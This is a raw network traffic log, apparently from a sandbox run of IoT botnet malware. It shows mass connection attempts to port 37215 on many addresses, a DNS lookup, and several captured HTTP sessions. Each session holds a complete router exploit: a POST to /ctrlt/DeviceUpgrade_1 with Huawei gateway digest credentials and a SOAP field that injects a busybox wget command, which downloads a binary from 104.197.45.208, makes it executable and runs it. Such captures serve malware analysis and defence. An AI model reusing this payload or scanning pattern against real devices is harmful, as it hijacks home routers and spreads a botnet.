                                            Jun 14, 2024 10:43:41.849780083 CEST3296437215192.168.2.14156.162.167.145
                                            Jun 14, 2024 10:43:41.849786997 CEST3322037215192.168.2.14156.162.167.145
                                            Jun 14, 2024 10:43:41.849802017 CEST5189037215192.168.2.1441.251.54.239
                                            Jun 14, 2024 10:43:41.849802017 CEST5189037215192.168.2.1441.251.54.239
                                            Jun 14, 2024 10:43:41.849824905 CEST5214637215192.168.2.1441.251.54.239
                                            Jun 14, 2024 10:43:41.849836111 CEST5761037215192.168.2.14197.93.197.167
                                            Jun 14, 2024 10:43:41.849836111 CEST5761037215192.168.2.14197.93.197.167
                                            Jun 14, 2024 10:43:41.849858999 CEST5786637215192.168.2.14197.93.197.167
                                            Jun 14, 2024 10:43:41.849859953 CEST5895437215192.168.2.14197.115.149.12
                                            Jun 14, 2024 10:43:41.849859953 CEST5895437215192.168.2.14197.115.149.12
                                            Jun 14, 2024 10:43:41.849874020 CEST5921037215192.168.2.14197.115.149.12
                                            Jun 14, 2024 10:43:41.849886894 CEST3530037215192.168.2.14197.67.213.250
                                            Jun 14, 2024 10:43:41.849886894 CEST3530037215192.168.2.14197.67.213.250
                                            Jun 14, 2024 10:43:41.849905968 CEST3555637215192.168.2.14197.67.213.250
                                            Jun 14, 2024 10:43:41.849920988 CEST5639037215192.168.2.14156.82.174.117
                                            Jun 14, 2024 10:43:41.849920988 CEST5639037215192.168.2.14156.82.174.117
                                            Jun 14, 2024 10:43:41.849940062 CEST5664637215192.168.2.14156.82.174.117
                                            Jun 14, 2024 10:43:41.849958897 CEST5501437215192.168.2.14156.58.23.199
                                            Jun 14, 2024 10:43:41.849958897 CEST5501437215192.168.2.14156.58.23.199
                                            Jun 14, 2024 10:43:41.849968910 CEST5527037215192.168.2.14156.58.23.199
                                            Jun 14, 2024 10:43:41.849983931 CEST4076037215192.168.2.1441.130.196.14
                                            Jun 14, 2024 10:43:41.849983931 CEST4076037215192.168.2.1441.130.196.14
                                            Jun 14, 2024 10:43:41.850017071 CEST4766437215192.168.2.14197.207.12.125
                                            Jun 14, 2024 10:43:41.850017071 CEST4766437215192.168.2.14197.207.12.125
                                            Jun 14, 2024 10:43:41.850028992 CEST4792037215192.168.2.14197.207.12.125
                                            Jun 14, 2024 10:43:41.850043058 CEST4853837215192.168.2.14197.36.168.96
                                            Jun 14, 2024 10:43:41.850049019 CEST4853837215192.168.2.14197.36.168.96
                                            Jun 14, 2024 10:43:41.850064039 CEST4101637215192.168.2.1441.130.196.14
                                            Jun 14, 2024 10:43:41.850065947 CEST4879437215192.168.2.14197.36.168.96
                                            Jun 14, 2024 10:43:41.850083113 CEST3625637215192.168.2.1441.229.65.243
                                            Jun 14, 2024 10:43:41.850083113 CEST3625637215192.168.2.1441.229.65.243
                                            Jun 14, 2024 10:43:41.850091934 CEST3651237215192.168.2.1441.229.65.243
                                            Jun 14, 2024 10:43:41.850109100 CEST3684237215192.168.2.1441.65.51.58
                                            Jun 14, 2024 10:43:41.850109100 CEST3684237215192.168.2.1441.65.51.58
                                            Jun 14, 2024 10:43:41.850123882 CEST3709837215192.168.2.1441.65.51.58
                                            Jun 14, 2024 10:43:41.850137949 CEST3686637215192.168.2.1441.31.131.18
                                            Jun 14, 2024 10:43:41.850145102 CEST3686637215192.168.2.1441.31.131.18
                                            Jun 14, 2024 10:43:41.850163937 CEST3712237215192.168.2.1441.31.131.18
                                            Jun 14, 2024 10:43:41.850178003 CEST5233237215192.168.2.1441.77.212.152
                                            Jun 14, 2024 10:43:41.850178003 CEST5233237215192.168.2.1441.77.212.152
                                            Jun 14, 2024 10:43:41.850194931 CEST5258837215192.168.2.1441.77.212.152
                                            Jun 14, 2024 10:43:41.850204945 CEST4925237215192.168.2.14156.39.27.172
                                            Jun 14, 2024 10:43:41.850204945 CEST4925237215192.168.2.14156.39.27.172
                                            Jun 14, 2024 10:43:41.850222111 CEST4950837215192.168.2.14156.39.27.172
                                            Jun 14, 2024 10:43:41.850238085 CEST5044437215192.168.2.1441.105.248.161
                                            Jun 14, 2024 10:43:41.850238085 CEST5044437215192.168.2.1441.105.248.161
                                            Jun 14, 2024 10:43:41.850255013 CEST5070037215192.168.2.1441.105.248.161
                                            Jun 14, 2024 10:43:41.850270987 CEST4620837215192.168.2.1441.136.10.6
                                            Jun 14, 2024 10:43:41.850270987 CEST4620837215192.168.2.1441.136.10.6
                                            Jun 14, 2024 10:43:41.850285053 CEST4646437215192.168.2.1441.136.10.6
                                            Jun 14, 2024 10:43:41.850298882 CEST3872437215192.168.2.1441.145.16.189
                                            Jun 14, 2024 10:43:41.850298882 CEST3872437215192.168.2.1441.145.16.189
                                            Jun 14, 2024 10:43:41.850322008 CEST3898037215192.168.2.1441.145.16.189
                                            Jun 14, 2024 10:43:41.850331068 CEST4768237215192.168.2.14197.55.190.177
                                            Jun 14, 2024 10:43:41.850331068 CEST4768237215192.168.2.14197.55.190.177
                                            Jun 14, 2024 10:43:41.850332975 CEST4793837215192.168.2.14197.55.190.177
                                            Jun 14, 2024 10:43:41.850352049 CEST4316037215192.168.2.14156.77.171.85
                                            Jun 14, 2024 10:43:41.850352049 CEST4316037215192.168.2.14156.77.171.85
                                            Jun 14, 2024 10:43:41.850370884 CEST4341637215192.168.2.14156.77.171.85
                                            Jun 14, 2024 10:43:41.850389957 CEST3449437215192.168.2.14197.52.64.141
                                            Jun 14, 2024 10:43:41.850389957 CEST3449437215192.168.2.14197.52.64.141
                                            Jun 14, 2024 10:43:41.850403070 CEST3475037215192.168.2.14197.52.64.141
                                            Jun 14, 2024 10:43:41.850403070 CEST4422637215192.168.2.14156.198.9.13
                                            Jun 14, 2024 10:43:41.850429058 CEST4422637215192.168.2.14156.198.9.13
                                            Jun 14, 2024 10:43:41.850445032 CEST4448237215192.168.2.14156.198.9.13
                                            Jun 14, 2024 10:43:41.850456953 CEST4598837215192.168.2.14197.178.164.7
                                            Jun 14, 2024 10:43:41.850456953 CEST4598837215192.168.2.14197.178.164.7
                                            Jun 14, 2024 10:43:41.850481987 CEST4624437215192.168.2.14197.178.164.7
                                            Jun 14, 2024 10:43:41.850483894 CEST3374837215192.168.2.14197.94.33.146
                                            Jun 14, 2024 10:43:41.850483894 CEST3374837215192.168.2.14197.94.33.146
                                            Jun 14, 2024 10:43:41.850497007 CEST3400437215192.168.2.14197.94.33.146
                                            Jun 14, 2024 10:43:41.850507975 CEST3666837215192.168.2.14197.151.161.254
                                            Jun 14, 2024 10:43:41.850514889 CEST3666837215192.168.2.14197.151.161.254
                                            Jun 14, 2024 10:43:41.850531101 CEST3692437215192.168.2.14197.151.161.254
                                            Jun 14, 2024 10:43:41.850554943 CEST3279037215192.168.2.14156.98.207.57
                                            Jun 14, 2024 10:43:41.850554943 CEST3279037215192.168.2.14156.98.207.57
                                            Jun 14, 2024 10:43:41.850564957 CEST3304637215192.168.2.14156.98.207.57
                                            Jun 14, 2024 10:43:41.850581884 CEST4845837215192.168.2.14156.22.246.78
                                            Jun 14, 2024 10:43:41.850581884 CEST4845837215192.168.2.14156.22.246.78
                                            Jun 14, 2024 10:43:41.850594044 CEST4871437215192.168.2.14156.22.246.78
                                            Jun 14, 2024 10:43:41.850615025 CEST5015037215192.168.2.1441.217.229.115
                                            Jun 14, 2024 10:43:41.850615025 CEST5015037215192.168.2.1441.217.229.115
                                            Jun 14, 2024 10:43:41.850622892 CEST5040637215192.168.2.1441.217.229.115
                                            Jun 14, 2024 10:43:41.850642920 CEST4997037215192.168.2.14156.129.8.36
                                            Jun 14, 2024 10:43:41.850642920 CEST4997037215192.168.2.14156.129.8.36
                                            Jun 14, 2024 10:43:41.850658894 CEST5022637215192.168.2.14156.129.8.36
                                            Jun 14, 2024 10:43:41.850672007 CEST5786837215192.168.2.1441.134.99.108
                                            Jun 14, 2024 10:43:41.850672007 CEST5786837215192.168.2.1441.134.99.108
                                            Jun 14, 2024 10:43:41.850691080 CEST5812437215192.168.2.1441.134.99.108
                                            Jun 14, 2024 10:43:41.850709915 CEST3563837215192.168.2.14197.160.183.210
                                            Jun 14, 2024 10:43:41.850709915 CEST3563837215192.168.2.14197.160.183.210
                                            Jun 14, 2024 10:43:41.850716114 CEST3589437215192.168.2.14197.160.183.210
                                            Jun 14, 2024 10:43:41.850729942 CEST5502037215192.168.2.14156.3.252.137
                                            Jun 14, 2024 10:43:41.850737095 CEST5502037215192.168.2.14156.3.252.137
                                            Jun 14, 2024 10:43:41.850749969 CEST5527637215192.168.2.14156.3.252.137
                                            Jun 14, 2024 10:43:41.850761890 CEST4391837215192.168.2.14197.75.132.120
                                            Jun 14, 2024 10:43:41.850761890 CEST4391837215192.168.2.14197.75.132.120
                                            Jun 14, 2024 10:43:41.850780010 CEST4417437215192.168.2.14197.75.132.120
                                            Jun 14, 2024 10:43:41.850794077 CEST4251837215192.168.2.14197.34.251.4
                                            Jun 14, 2024 10:43:41.850794077 CEST4251837215192.168.2.14197.34.251.4
                                            Jun 14, 2024 10:43:41.850804090 CEST4277437215192.168.2.14197.34.251.4
                                            Jun 14, 2024 10:43:41.868123055 CEST3721546522197.69.99.166192.168.2.14
                                            Jun 14, 2024 10:43:41.868143082 CEST3721546764197.69.99.166192.168.2.14
                                            Jun 14, 2024 10:43:41.868212938 CEST4676437215192.168.2.14197.69.99.166
                                            Jun 14, 2024 10:43:41.868233919 CEST372153406841.204.119.255192.168.2.14
                                            Jun 14, 2024 10:43:41.868253946 CEST372153432041.204.119.255192.168.2.14
                                            Jun 14, 2024 10:43:41.868272066 CEST3721554050156.92.102.202192.168.2.14
                                            Jun 14, 2024 10:43:41.868289948 CEST3721554292156.92.102.202192.168.2.14
                                            Jun 14, 2024 10:43:41.868289948 CEST3432037215192.168.2.1441.204.119.255
                                            Jun 14, 2024 10:43:41.868308067 CEST4676437215192.168.2.14197.69.99.166
                                            Jun 14, 2024 10:43:41.868309021 CEST3721535024197.12.252.127192.168.2.14
                                            Jun 14, 2024 10:43:41.868324995 CEST5429237215192.168.2.14156.92.102.202
                                            Jun 14, 2024 10:43:41.868328094 CEST3721535244197.12.252.127192.168.2.14
                                            Jun 14, 2024 10:43:41.868360996 CEST3524437215192.168.2.14197.12.252.127
                                            Jun 14, 2024 10:43:41.868381977 CEST372154225841.117.215.153192.168.2.14
                                            Jun 14, 2024 10:43:41.868396997 CEST5040437215192.168.2.14197.248.137.205
                                            Jun 14, 2024 10:43:41.868400097 CEST372154252241.117.215.153192.168.2.14
                                            Jun 14, 2024 10:43:41.868419886 CEST3721555630156.24.7.74192.168.2.14
                                            Jun 14, 2024 10:43:41.868422031 CEST3432037215192.168.2.1441.204.119.255
                                            Jun 14, 2024 10:43:41.868422031 CEST5429237215192.168.2.14156.92.102.202
                                            Jun 14, 2024 10:43:41.868432999 CEST3524437215192.168.2.14197.12.252.127
                                            Jun 14, 2024 10:43:41.868432999 CEST4252237215192.168.2.1441.117.215.153
                                            Jun 14, 2024 10:43:41.868439913 CEST3721555866156.24.7.74192.168.2.14
                                            Jun 14, 2024 10:43:41.868457079 CEST4203037215192.168.2.14197.254.137.241
                                            Jun 14, 2024 10:43:41.868458033 CEST3721547232197.84.144.33192.168.2.14
                                            Jun 14, 2024 10:43:41.868473053 CEST5918837215192.168.2.14156.218.178.89
                                            Jun 14, 2024 10:43:41.868474007 CEST3578437215192.168.2.1441.188.209.121
                                            Jun 14, 2024 10:43:41.868474960 CEST5586637215192.168.2.14156.24.7.74
                                            Jun 14, 2024 10:43:41.868477106 CEST3721547466197.84.144.33192.168.2.14
                                            Jun 14, 2024 10:43:41.868496895 CEST4252237215192.168.2.1441.117.215.153
                                            Jun 14, 2024 10:43:41.868515968 CEST4746637215192.168.2.14197.84.144.33
                                            Jun 14, 2024 10:43:41.868519068 CEST5586637215192.168.2.14156.24.7.74
                                            Jun 14, 2024 10:43:41.868535995 CEST6058237215192.168.2.1441.26.203.87
                                            Jun 14, 2024 10:43:41.868555069 CEST4143037215192.168.2.14197.217.192.190
                                            Jun 14, 2024 10:43:41.868556023 CEST372155792241.201.39.196192.168.2.14
                                            Jun 14, 2024 10:43:41.868571997 CEST4746637215192.168.2.14197.84.144.33
                                            Jun 14, 2024 10:43:41.868575096 CEST372154739041.30.5.248192.168.2.14
                                            Jun 14, 2024 10:43:41.868578911 CEST4030437215192.168.2.14197.135.208.50
                                            Jun 14, 2024 10:43:41.868591070 CEST5792237215192.168.2.1441.201.39.196
                                            Jun 14, 2024 10:43:41.868593931 CEST372155768841.201.39.196192.168.2.14
                                            Jun 14, 2024 10:43:41.868613005 CEST372154761641.30.5.248192.168.2.14
                                            Jun 14, 2024 10:43:41.868617058 CEST5792237215192.168.2.1441.201.39.196
                                            Jun 14, 2024 10:43:41.868630886 CEST3721552042156.211.202.95192.168.2.14
                                            Jun 14, 2024 10:43:41.868638039 CEST3585437215192.168.2.14197.87.208.213
                                            Jun 14, 2024 10:43:41.868647099 CEST4761637215192.168.2.1441.30.5.248
                                            Jun 14, 2024 10:43:41.868665934 CEST3721552314156.211.202.95192.168.2.14
                                            Jun 14, 2024 10:43:41.868668079 CEST4761637215192.168.2.1441.30.5.248
                                            Jun 14, 2024 10:43:41.868685007 CEST372156016441.208.18.167192.168.2.14
                                            Jun 14, 2024 10:43:41.868686914 CEST4961837215192.168.2.14156.178.68.22
                                            Jun 14, 2024 10:43:41.868701935 CEST5231437215192.168.2.14156.211.202.95
                                            Jun 14, 2024 10:43:41.868704081 CEST372156043641.208.18.167192.168.2.14
                                            Jun 14, 2024 10:43:41.868726969 CEST5231437215192.168.2.14156.211.202.95
                                            Jun 14, 2024 10:43:41.868737936 CEST6043637215192.168.2.1441.208.18.167
                                            Jun 14, 2024 10:43:41.868746042 CEST4843437215192.168.2.14197.15.50.175
                                            Jun 14, 2024 10:43:41.868797064 CEST6043637215192.168.2.1441.208.18.167
                                            Jun 14, 2024 10:43:41.868810892 CEST4068637215192.168.2.14156.2.150.245
                                            Jun 14, 2024 10:43:41.868952990 CEST3721537268156.77.120.44192.168.2.14
                                            Jun 14, 2024 10:43:41.868972063 CEST3721537538156.77.120.44192.168.2.14
                                            Jun 14, 2024 10:43:41.869010925 CEST3753837215192.168.2.14156.77.120.44
                                            Jun 14, 2024 10:43:41.869029999 CEST3753837215192.168.2.14156.77.120.44
                                            Jun 14, 2024 10:43:41.869041920 CEST4408237215192.168.2.1441.198.151.33
                                            Jun 14, 2024 10:43:41.869111061 CEST3721540172197.115.206.145192.168.2.14
                                            Jun 14, 2024 10:43:41.869232893 CEST3721540436197.115.206.145192.168.2.14
                                            Jun 14, 2024 10:43:41.869266033 CEST3721556822197.81.94.253192.168.2.14
                                            Jun 14, 2024 10:43:41.869271040 CEST4043637215192.168.2.14197.115.206.145
                                            Jun 14, 2024 10:43:41.869285107 CEST4043637215192.168.2.14197.115.206.145
                                            Jun 14, 2024 10:43:41.869287014 CEST3721557072197.81.94.253192.168.2.14
                                            Jun 14, 2024 10:43:41.869293928 CEST4422437215192.168.2.1441.240.145.233
                                            Jun 14, 2024 10:43:41.869328976 CEST5707237215192.168.2.14197.81.94.253
                                            Jun 14, 2024 10:43:41.869347095 CEST5707237215192.168.2.14197.81.94.253
                                            Jun 14, 2024 10:43:41.869358063 CEST5815237215192.168.2.1441.88.32.119
                                            Jun 14, 2024 10:43:41.869474888 CEST372154060041.7.213.46192.168.2.14
                                            Jun 14, 2024 10:43:41.869494915 CEST372154087441.7.213.46192.168.2.14
                                            Jun 14, 2024 10:43:41.869528055 CEST3721541334156.178.97.126192.168.2.14
                                            Jun 14, 2024 10:43:41.869533062 CEST4087437215192.168.2.1441.7.213.46
                                            Jun 14, 2024 10:43:41.869545937 CEST4087437215192.168.2.1441.7.213.46
                                            Jun 14, 2024 10:43:41.869546890 CEST3721541608156.178.97.126192.168.2.14
                                            Jun 14, 2024 10:43:41.869565010 CEST3721545766197.221.114.154192.168.2.14
                                            Jun 14, 2024 10:43:41.869570971 CEST5026237215192.168.2.14197.143.25.209
                                            Jun 14, 2024 10:43:41.869580984 CEST4160837215192.168.2.14156.178.97.126
                                            Jun 14, 2024 10:43:41.869590998 CEST4160837215192.168.2.14156.178.97.126
                                            Jun 14, 2024 10:43:41.869601965 CEST3746037215192.168.2.1441.106.48.193
                                            Jun 14, 2024 10:43:41.869636059 CEST3721546032197.221.114.154192.168.2.14
                                            Jun 14, 2024 10:43:41.869672060 CEST3721538618197.197.35.65192.168.2.14
                                            Jun 14, 2024 10:43:41.869674921 CEST4603237215192.168.2.14197.221.114.154
                                            Jun 14, 2024 10:43:41.869684935 CEST4603237215192.168.2.14197.221.114.154
                                            Jun 14, 2024 10:43:41.869700909 CEST4980237215192.168.2.14156.74.28.27
                                            Jun 14, 2024 10:43:41.869714022 CEST3721538884197.197.35.65192.168.2.14
                                            Jun 14, 2024 10:43:41.869752884 CEST3888437215192.168.2.14197.197.35.65
                                            Jun 14, 2024 10:43:41.869756937 CEST3721545734197.105.185.234192.168.2.14
                                            Jun 14, 2024 10:43:41.869771957 CEST3888437215192.168.2.14197.197.35.65
                                            Jun 14, 2024 10:43:41.869776011 CEST3721546000197.105.185.234192.168.2.14
                                            Jun 14, 2024 10:43:41.869786024 CEST5016237215192.168.2.1441.223.35.223
                                            Jun 14, 2024 10:43:41.869810104 CEST4600037215192.168.2.14197.105.185.234
                                            Jun 14, 2024 10:43:41.869811058 CEST372153725841.187.117.105192.168.2.14
                                            Jun 14, 2024 10:43:41.869823933 CEST4600037215192.168.2.14197.105.185.234
                                            Jun 14, 2024 10:43:41.869833946 CEST372153751441.187.117.105192.168.2.14
                                            Jun 14, 2024 10:43:41.869842052 CEST4129237215192.168.2.14197.44.120.76
                                            Jun 14, 2024 10:43:41.869853973 CEST3721560490197.164.6.148192.168.2.14
                                            Jun 14, 2024 10:43:41.869872093 CEST3721560746197.164.6.148192.168.2.14
                                            Jun 14, 2024 10:43:41.869873047 CEST3751437215192.168.2.1441.187.117.105
                                            Jun 14, 2024 10:43:41.869884014 CEST3751437215192.168.2.1441.187.117.105
                                            Jun 14, 2024 10:43:41.869890928 CEST3721552476197.28.230.71192.168.2.14
                                            Jun 14, 2024 10:43:41.869906902 CEST6074637215192.168.2.14197.164.6.148
                                            Jun 14, 2024 10:43:41.869910955 CEST3721552730197.28.230.71192.168.2.14
                                            Jun 14, 2024 10:43:41.869918108 CEST5646437215192.168.2.14197.49.222.147
                                            Jun 14, 2024 10:43:41.869927883 CEST6074637215192.168.2.14197.164.6.148
                                            Jun 14, 2024 10:43:41.869942904 CEST5149237215192.168.2.14197.189.146.28
                                            Jun 14, 2024 10:43:41.869946003 CEST5273037215192.168.2.14197.28.230.71
                                            Jun 14, 2024 10:43:41.869949102 CEST3721556548156.2.146.186192.168.2.14
                                            Jun 14, 2024 10:43:41.869963884 CEST5273037215192.168.2.14197.28.230.71
                                            Jun 14, 2024 10:43:41.869968891 CEST3721556800156.2.146.186192.168.2.14
                                            Jun 14, 2024 10:43:41.869977951 CEST3581237215192.168.2.1441.2.251.42
                                            Jun 14, 2024 10:43:41.869987965 CEST3721537278197.55.73.26192.168.2.14
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Jun 14, 2024 10:46:15.555670023 CEST192.168.2.148.8.8.80xe01eStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                            Jun 14, 2024 10:46:15.555670023 CEST192.168.2.148.8.8.80xe917Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Jun 14, 2024 10:46:15.563155890 CEST8.8.8.8192.168.2.140xe01eNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                            Jun 14, 2024 10:46:15.563155890 CEST8.8.8.8192.168.2.140xe01eNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                            Session IDSource IPSource PortDestination IPDestination Port
                                            0192.168.2.1442152156.47.96.25437215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660265923 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1192.168.2.144176641.60.152.24937215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660336971 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2192.168.2.143856841.245.235.25537215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660377026 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3192.168.2.1444308156.224.103.15837215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660394907 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
